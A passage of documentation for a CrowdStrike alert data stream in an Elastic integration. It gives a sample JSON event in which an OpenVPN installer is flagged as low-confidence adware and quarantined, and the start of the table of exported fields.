`Alert` dataset. + +#### Example + +An example event for `alert` looks as following: + +```json +{ + "@timestamp": "2023-11-03T18:00:22.328Z", + "agent": { + "ephemeral_id": "532c45c9-f01e-40e0-9406-8997b9a2b29c", + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "crowdstrike": { + "alert": { + "agent_id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id": "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype": "exe", + "cid": "92012896127c4a948236ba7601b886b0", + "cloud_indicator": false, + "cmdline": "\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id": "92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence": 10, + "context_timestamp": "2023-11-03T18:00:31.000Z", + "control_graph_id": "ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids": { + "Sensor": [ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids": { + "Sensor": [ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp": "2023-11-03T19:00:23.985Z", + "created_timestamp": "2023-11-03T18:01:23.995Z", + "data_domains": [ + "Endpoint" + ], + "description": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device": { + "agent_load_flags": 0, + "agent_local_time": "2023-10-12T03:45:57.753Z", + "agent_version": "7.04.17605.0", + "bios_manufacturer": "ABC", + "bios_version": "F8CN42WW(V2.05)", + "cid": "92012896127c4a948236ba7601b886b0", + "config_id_base": "65994763", + "config_id_build": "17605", + "config_id_platform": 3, + "external_ip": "81.2.69.142", + "first_seen": "2023-04-07T09:36:36.000Z", + "groups": [ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo": { + "active_directory_dn_display": [ + "WinComputers", + "WinComputers\\ABC" + ], + "domain": "ABC.LOCAL" + }, + "hostname": "ABC709-1175", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "last_seen": "2023-11-03T17:51:42.000Z", + "local_ip": "81.2.69.142", + "mac_address": "AB-21-48-61-05-B2", + "machine_domain": "ABC.LOCAL", + "major_version": "10", + "minor_version": "0", + "modified_timestamp": "2023-11-03T17:53:43.000Z", + "os_version": "Windows11", + "ou": [ + "ABC", + "WinComputers" + ], + "platform_id": "0", + "platform_name": "Windows", + "product_type": "1", + "product_type_desc": "Workstation", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system_manufacturer": "LENOVO", + "system_product_name": "20VE" + }, + "falcon_host_link": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details": { + "cmdline": "C:\\Windows\\system32\\userinit.exe", + "filename": "userinit.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id": "4328", + "md5": "b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id": "392734873135", + "sha256": "caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp": "2023-10-30T16:49:19.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "yuvraj.mahajan" + }, + "has_script_or_module_ioc": true, + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context": [ + { + "ioc_description": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source": "library_load", + "ioc_type": "hash_sha256", + "ioc_value": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type": "module" + } + ], + "is_synthetic_quarantine_disposition": true, + "local_process_id": "17076", + "logon_domain": "ABSYS", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "name": "PrewittPupAdwareSensorDetect-Lowest", + "objective": "FalconDetectionMethod", + "parent_details": { + "cmdline": "C:\\WINDOWS\\Explorer.EXE", + "filename": "explorer.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id": "1040", + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id": "392736520876", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp": "2023-11-03T18:00:32.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + }, + "parent_process_id": "392736520876", + "pattern_disposition": 2176, + "pattern_disposition_description": "Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details": { + "blocking_unsupported_or_disabled": false, + "bootup_safeguard_enabled": false, + "critical_process_disabled": false, + "detect": false, + "fs_operation_blocked": false, + "handle_operation_downgraded": false, + "inddet_mask": false, + "indicator": false, + "kill_action_failed": false, + "kill_parent": false, + "kill_process": false, + "kill_subprocess": false, + "operation_blocked": false, + "policy_disabled": false, + "process_blocked": true, + "quarantine_file": true, + "quarantine_machine": false, + "registry_operation_blocked": false, + "rooting": false, + "sensor_only": false, + "suspend_parent": false, + "suspend_process": false + }, + "pattern_id": "5761", + "platform": "Windows", + "poly_id": "AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time": "2023-11-03T18:00:21.000Z", + "process_id": "399748687993", + "process_start_time": "2023-11-03T18:00:13.000Z", + "product": "epp", + "quarantined_files": [ + { + "filename": "\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state": "quarantined" + } + ], + "scenario": "NGAV", + "severity": 30, + "sha1": "0000000000000000000000000000000000000000", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui": true, + "source_products": [ + "FalconInsight" + ], + "source_vendors": [ + "CrowdStrike" + ], + "status": "new", + "tactic": "MachineLearning", + "tactic_id": "CSTA0004", + "technique": "Adware/PUP", + "technique_id": "CST0000", + "timestamp": "2023-11-03T18:00:22.328Z", + "tree_id": "1931778", + "tree_root": "38687993", + "triggering_process_graph_id": "pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type": "ldt", + "updated_timestamp": "2023-11-03T19:00:23.985Z", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + } + }, + "data_stream": { + "dataset": "crowdstrike.alert", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "2ce412d17b334ad4adc8c1c54dbfec4b" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "dataset": "crowdstrike.alert", + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ingested": "2024-02-21T09:17:46Z", + "kind": "alert", + "original": "{\"agent_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"aggregate_id\":\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"alleged_filetype\":\"exe\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"cloud_indicator\":\"false\",\"cmdline\":\"\\\"C:\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\\\"\",\"composite_id\":\"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"confidence\":10,\"context_timestamp\":\"2023-11-03T18:00:31Z\",\"control_graph_id\":\"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778\",\"crawl_edge_ids\":{\"Sensor\":[\"KZcZ=__;K\\u0026cmqQ]Z=W,QK4W.9(rBfs\\\\gfmjTblqI^F-_oNnAWQ\\u0026-o0:dR/\\u003e\\u003e2J\\u003cd2T/ji6R\\u0026RIHe-tZSkP*q?HW;:leq.:kk)\\u003eIVMD36[+=kiQDRm.bB?;d\\\"V0JaQlaltC59Iq6nM?6`\\u003eZAs+LbOJ9p9A;9'WV9^H3XEMs8N\",\"KZcZA__;?\\\"cmott@m_k)MSZ^+C?.cg\\u003cLga#0@71X07*LY2teE56*16pL[=!bjF7g@0jOQE'jT6RX_F@sr#RP-U/d[#nm9A,A,W%cl/T@\\u003cW`alY1K_h%QDBBF;_e7S!!*'!\",\"KZd)iK2;s\\\\ckQl_P*d=Mo?^a7/JKc\\\\*L48169!7I5;0\\\\\\u003cH^hNG\\\"ZQ3#U3\\\"eo\\u003c\\u003e92t[f!\\u003e*b9WLY@H!V0N,BJsNSTD:?/+fY';e\\u003cOHh9AmlT?5\\u003cgGqK:*L99kat+P)eZ$HR\\\"Ql@Q!!!$!rr\",\"N6=Ks_B9Bncmur)?\\\\[fV$k/N5;:6@aB$P;R$2XAaPJ?E\\u003cG5,UfaP')8#2AY4ff+q?T?b0/RBi-YAeGmb\\u003c6Bqp[DZh#I(jObGkjJJaMf\\\\:#mb;BM\\\\L[g!\\\\F*M!!*'!\",\"N6B%O`'=_7d#%u\\u0026d[+LTNDs\\u003c3307?8n=GrFI:4YYGCL,cIt-Tuj!\\u0026\\u003c6:3RbC`uNjL#gW\\u0026=)E`4^/'fp*.bFX@p_$,R6.\\\"=lV*T*5Vf`c.:nkd$+YD:DJ,Ls0[sArC')K%YTc$:@kUQW5s8N\",\"N6B%s!\\\\k)ed$F6\\u003ea%iM\\\"\\u003cFTSe/eH8M:\\u003c9gf;$$.b??kpC*99aX!Lq:g6:Q3@Ga4Zrb@MaMa]L'YAt$IFBu])\\\"H^sF$r7gDPf6\\u0026CHpVKO3\\u003cDgK9,Y/e@V\\\"b\\u0026m!\\u003c\\u003c'\",\"N6CU\\u0026`%VT\\\"d$=67=h\\\\I)/BJH:8-lS!.%\\\\-!$1@bAhtVO?q4]9'9'haE4N0*-0Uh'-'f',YW3]T=jL3D#N=fJi]Pp-bWej+R9q[%h[p]p26NK8q3b50k9G:.\\u0026eM\\u003cQer\\u003e__\\\"59K'R?_=`'`rK/'hA\\\"r+L5i-*Ut5PI!!*'!\",\"N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A\\u0026FE;(naXB4h/OG\\\"%MDAR=fo41Z]rXc\\\"J-\\\\\\u0026\\u0026V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr\",\"N6CUF__;K!d$:\\\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\\\"X'\\\\AtNML2_C__7ic6,8Dc[F\\u003c0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##\\u0026$^81(P+hN*-#rf/cUs)Wb\\\"\\u003c_/?I'[##WMh'H[Rcl+!!\\u003c\\u003c'\",\"N6L[G__;K!d\\\"qhT7k?[D\\\"Bk:5s%+=\\u003e#DM0j$_\\u003cr/JG0TCEQ!Ug(be3)\\u0026R2JnX+RSqorgC-NCjf6XATBWX(5\\u003cL1J1DV\\u003e44ZjO9q*d!YLuHhkq!3\\u003e3tpi\\u003eOPYZp9]5f1#/AlRZL06`/I6cl\\\"d.\\u0026=To@9kS!prs8N\"]},\"crawl_vertex_ids\":{\"Sensor\":[\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993\",\"quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\"]},\"crawled_timestamp\":\"2023-11-03T19:00:23.985020992Z\",\"created_timestamp\":\"2023-11-03T18:01:23.995794943Z\",\"data_domains\":[\"Endpoint\"],\"description\":\"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.\",\"device\":{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-10-12T03:45:57.753Z\",\"agent_version\":\"7.04.17605.0\",\"bios_manufacturer\":\"ABC\",\"bios_version\":\"F8CN42WW(V2.05)\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"config_id_base\":\"65994763\",\"config_id_build\":\"17605\",\"config_id_platform\":\"3\",\"device_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"external_ip\":\"81.2.69.142\",\"first_seen\":\"2023-04-07T09:36:36Z\",\"groups\":[\"18704e21288243b58e4c76266d38caaf\"],\"hostinfo\":{\"active_directory_dn_display\":[\"WinComputers\",\"WinComputers\\\\ABC\"],\"domain\":\"ABC.LOCAL\"},\"hostname\":\"ABC709-1175\",\"last_seen\":\"2023-11-03T17:51:42Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"ab-21-48-61-05-b2\",\"machine_domain\":\"ABC.LOCAL\",\"major_version\":\"10\",\"minor_version\":\"0\",\"modified_timestamp\":\"2023-11-03T17:53:43Z\",\"os_version\":\"Windows11\",\"ou\":[\"ABC\",\"WinComputers\"],\"platform_id\":\"0\",\"platform_name\":\"Windows\",\"pod_labels\":null,\"product_type\":\"1\",\"product_type_desc\":\"Workstation\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"LENOVO\",\"system_product_name\":\"20VE\"},\"falcon_host_link\":\"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"filename\":\"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"grandparent_details\":{\"cmdline\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"filename\":\"userinit.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\userinit.exe\",\"local_process_id\":\"4328\",\"md5\":\"b07f77fd3f9828b2c9d61f8a36609741\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135\",\"process_id\":\"392734873135\",\"sha256\":\"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"timestamp\":\"2023-10-30T16:49:19Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"yuvraj.mahajan\"},\"has_script_or_module_ioc\":\"true\",\"id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"indicator_id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"ioc_context\":[{\"ioc_description\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"ioc_source\":\"library_load\",\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"type\":\"module\"}],\"ioc_values\":[],\"is_synthetic_quarantine_disposition\":true,\"local_process_id\":\"17076\",\"logon_domain\":\"ABSYS\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"name\":\"PrewittPupAdwareSensorDetect-Lowest\",\"objective\":\"FalconDetectionMethod\",\"parent_details\":{\"cmdline\":\"C:\\\\WINDOWS\\\\Explorer.EXE\",\"filename\":\"explorer.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\explorer.exe\",\"local_process_id\":\"1040\",\"md5\":\"8cc3fcdd7d52d2d5221303c213e044ae\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"process_id\":\"392736520876\",\"sha256\":\"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"timestamp\":\"2023-11-03T18:00:32Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"},\"parent_process_id\":\"392736520876\",\"pattern_disposition\":2176,\"pattern_disposition_description\":\"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.\",\"pattern_disposition_details\":{\"blocking_unsupported_or_disabled\":false,\"bootup_safeguard_enabled\":false,\"critical_process_disabled\":false,\"detect\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"inddet_mask\":false,\"indicator\":false,\"kill_action_failed\":false,\"kill_parent\":false,\"kill_process\":false,\"kill_subprocess\":false,\"operation_blocked\":false,\"policy_disabled\":false,\"process_blocked\":true,\"quarantine_file\":true,\"quarantine_machine\":false,\"registry_operation_blocked\":false,\"rooting\":false,\"sensor_only\":false,\"suspend_parent\":false,\"suspend_process\":false},\"pattern_id\":5761,\"platform\":\"Windows\",\"poly_id\":\"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==\",\"process_end_time\":\"1699034421\",\"process_id\":\"399748687993\",\"process_start_time\":\"1699034413\",\"product\":\"epp\",\"quarantined_files\":[{\"filename\":\"\\\\Device\\\\Volume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"id\":\"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"state\":\"quarantined\"}],\"scenario\":\"NGAV\",\"severity\":30,\"sha1\":\"0000000000000000000000000000000000000000\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"show_in_ui\":true,\"source_products\":[\"FalconInsight\"],\"source_vendors\":[\"CrowdStrike\"],\"status\":\"new\",\"tactic\":\"MachineLearning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Adware/PUP\",\"technique_id\":\"CST0000\",\"timestamp\":\"2023-11-03T18:00:22.328Z\",\"tree_id\":\"1931778\",\"tree_root\":\"38687993\",\"triggering_process_graph_id\":\"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993\",\"type\":\"ldt\",\"updated_timestamp\":\"2023-11-03T19:00:23.985007341Z\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"}", + "severity": 30 + }, + "file": { + "name": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "path": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe" + }, + "host": { + "domain": "ABC.LOCAL", + "hostname": "ABC709-1175", + "ip": [ + "81.2.69.142" + ], + "mac": [ + "AB-21-48-61-05-B2" + ], + "os": { + "full": "Windows11", + "platform": "Windows" + } + }, + "input": { + "type": "cel" + }, + "message": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "process": { + "end": "2023-11-03T18:00:21.000Z", + "parent": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "hash": { + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4" + }, + "pid": 392736520876 + }, + "pid": 399748687993, + "start": "2023-11-03T18:00:13.000Z", + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + }, + "related": { + "hash": [ + "ABC709-1175", + "b07f77fd3f9828b2c9d61f8a36609741", + "cdf9cfebb400ce89d5b6032bfcdc693b", + "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "8cc3fcdd7d52d2d5221303c213e044ae", + "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "0000000000000000000000000000000000000000" + ], + "hosts": [ + "ABC.LOCAL" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "S-1-5-21-1909377054-3469629671-4104191496-4425", + "yuvraj.mahajan", + "mohit.jha" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-alert" + ], + "threat": { + "tactic": { + "id": [ + "TA0004" + ], + "name": [ + "MachineLearning" + ] + }, + "technique": { + "id": [ + "T0000" + ], + "name": [ + "Adware/PUP" + ] + } + }, + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| crowdstrike.alert.agent_id | Unique identifier for the CrowdStrike agent. | keyword | +| crowdstrike.alert.aggregate_id | An aggregate identifier associated with the agent. | keyword | +| crowdstrike.alert.alleged_filetype | The alleged file type of the detected file. | keyword | +| crowdstrike.alert.cid | CrowdStrike identifier associated with the device. | keyword | +| crowdstrike.alert.cloud_indicator | Indicates whether the activity is related to the cloud. | boolean | +| crowdstrike.alert.cmdline | The command line used to execute the file. | keyword | +| crowdstrike.alert.composite_id | A composite identifier associated with the device. | keyword | +| crowdstrike.alert.confidence | Confidence level associated with the detection. | long | +| crowdstrike.alert.context_timestamp | Timestamp when the alert was generated. | date | +| crowdstrike.alert.control_graph_id | Identifier associated with the control graph. | keyword | +| crowdstrike.alert.crawl_edge_ids.Sensor | Edge identifiers associated with crawling. | keyword | +| crowdstrike.alert.crawl_vertex_ids.Sensor | Vertex identifiers associated with crawling. | keyword | +| crowdstrike.alert.crawled_timestamp | Timestamp indicating when crawling occurred. | date | +| crowdstrike.alert.created_timestamp | Timestamp indicating when the alert was created. | date | +| crowdstrike.alert.data_domains | Data domains associated with the alert. | keyword | +| crowdstrike.alert.description | Description of the detected file or activity. | keyword | +| crowdstrike.alert.device.agent_load_flags | Flags indicating the load status of the agent. | long | +| crowdstrike.alert.device.agent_local_time | Local time of the agent. | date | +| crowdstrike.alert.device.agent_version | Version of the CrowdStrike agent. | keyword | +| crowdstrike.alert.device.bios_manufacturer | Manufacturer of the BIOS. | 